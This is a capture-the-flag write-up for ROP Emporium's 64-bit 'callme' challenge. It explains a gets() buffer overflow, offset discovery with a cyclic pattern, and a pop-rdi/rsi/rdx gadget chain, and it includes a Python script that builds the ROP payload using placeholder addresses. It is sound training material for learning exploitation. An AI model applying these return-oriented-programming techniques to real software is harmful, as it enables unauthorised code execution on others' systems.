ROP Emporium Callme (64 Bit) Writeup
This is the third challenge in ROP Emporium, and it does get a bit tricky from here. I had to call three functions, each with the same three arguments: 0xdeadbeef, 0xcafebabe and 0xd00df00d. So let’s get started with the challenge.
First, I check what type of file the given binary is.
Next, I check the memory protections on the binary with “checksec”.
Now I had to check the functions present in the binary. I used rabin2 to get the details.
rabin2 -i binary_name
I noticed last time that rabin2 and gdb don’t list every function in the binary, so I used objdump, which does. Once again, usefulFunction() wasn’t shown by rabin2 or gdb :(
As per the hint on the website, the functions to call are callme1(), callme2() and callme3(). On further analysis of the binary, I found that main() calls pwnme(), and pwnme() reads input with gets(), which has no length check; that is the overflow I use to exploit this challenge.
I had to find the offset needed to overwrite the buffer, the padding and the saved RBP. To do this, I used “pattern create” in gdb-peda, then fed the pattern as input while running the binary inside gdb-peda.
Here we don’t get the overwritten value directly from RIP: on 64-bit the CPU refuses to load a non-canonical address like the pattern bytes into RIP, so the crash happens at the ret and RIP still points at it. Instead we read the pattern bytes that landed in RBP, find their offset, and add 8 for the saved return address.
So 32 + 8 = 40 bytes of filler overwrite the buffer, the padding and the saved RBP, and the next 8 bytes land in the return address. Now I had to find the addresses of callme1(), callme2() and callme3(). I used the ones rabin2 gave us back in picture 3. This is where things take a turn: how do we pass three arguments to a function once we control RIP? A quick Google search on how the 64-bit architecture passes arguments gives a clear view: unlike 32-bit, they are not read from the stack but must be preloaded into registers. The registers that need to be used here can be seen in usefulFunction().
So RDI, RSI and RDX are the registers that hold the first, second and third argument. We need a gadget that pops values off the stack into these registers; to find one I used ROPgadget.
The third one is perfect for preloading the values. Now I worked out the logic. First I overwrite the buffer, the padding and RBP to reach RIP. Then I preload the registers: I return into the gadget, followed on the stack by the three arguments 0xdeadbeef, 0xcafebabe and 0xd00df00d, which the pops move into the registers. Finally, the gadget’s ret lands on the address of callme1(). I repeat this for the other two functions as well. So here is my exploit. Refer to my previous blogs on how to draw the stack diagram for this.
The website’s hint explains why the 64-bit version uses 0xdeadbeefdeadbeef (and likewise the other two arguments, each repeated to fill 8 bytes). Executing the above code should give me the flag.
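As an added illustration of the two steps described above (recovering the offset from the pattern bytes left in RBP, and laying out gadget, arguments and function address on the stack), here is a small Python script. It is not the author’s exploit: it generates its own De Bruijn pattern (the same idea as gdb-peda’s pattern create), the RBP value is a constructed debugger readout, and the gadget and callme addresses are placeholders, since the real ones come from ROPgadget and rabin2 output for your copy of the binary. The gadget order pop rdi; pop rsi; pop rdx; ret is assumed.

```python
import string
import struct


def p64(value):
    """Pack an integer as a little-endian 64-bit qword (like pwntools' p64)."""
    return struct.pack("<Q", value)


def cyclic(length, alphabet=string.ascii_lowercase, n=4):
    """De Bruijn sequence: every n-byte window is unique, so any n bytes read
    back from a register pinpoint their offset (same idea as gdb-peda's
    'pattern create')."""
    k = len(alphabet)
    a = [0] * (k * n)
    out = []

    def db(t, p):
        if len(out) >= length:          # stop once we have enough pattern
            return
        if t > n:
            if n % p == 0:
                out.extend(alphabet[a[j]] for j in range(1, p + 1))
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return "".join(out[:length]).encode()


def find_offset(pattern, rbp_value):
    """Offset of the 8 pattern bytes that ended up in RBP. The debugger shows
    RBP as a little-endian integer, so pack it back into memory order first."""
    return pattern.find(p64(rbp_value))


def build_chain(padding, gadget, funcs, args):
    """One block per function, assuming the gadget is pop rdi; pop rsi; pop rdx; ret:
    [gadget][arg1 -> rdi][arg2 -> rsi][arg3 -> rdx][function]
    The gadget's ret then lands on the function, which reads its arguments from
    the registers as the x86-64 calling convention requires."""
    payload = b"A" * padding
    for func in funcs:
        payload += p64(gadget) + b"".join(p64(a) for a in args) + p64(func)
    return payload


# Constructed debugger readout: the crash left 'iaaajaaa' (pattern bytes 32..39) in RBP.
RBP_SEEN_IN_GDB = 0x6161616A61616169

# Placeholder addresses; take the real ones from ROPgadget / rabin2 output.
POP_RDI_RSI_RDX_RET = 0x401000                 # placeholder gadget address
CALLME = [0x401001, 0x401002, 0x401003]        # placeholders for callme1/2/3
ARGS = [0xDEADBEEFDEADBEEF, 0xCAFEBABECAFEBABE, 0xD00DF00DD00DF00D]


def main():
    rbp_offset = find_offset(cyclic(200), RBP_SEEN_IN_GDB)
    ret_offset = rbp_offset + 8  # saved RBP is followed by the return address
    payload = build_chain(ret_offset, POP_RDI_RSI_RDX_RET, CALLME, ARGS)
    print(f"RBP at {rbp_offset}, return address at {ret_offset}, payload {len(payload)} bytes")
    with open("payload.bin", "wb") as f:
        f.write(payload)


if __name__ == "__main__":
    main()
```

The script writes the chain to payload.bin so it can be fed to the binary on standard input; with the constructed RBP value it reports offset 32, return address at 40, and a 160-byte payload (40 bytes of filler plus three 40-byte gadget/argument/function blocks).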
WE HAVE OUR FLAG!
Hope you understood the challenge. Do check out my other blogs.
Don’t forget to give some claps if you reached here :) Follow me for more write-ups.
Goodbye:)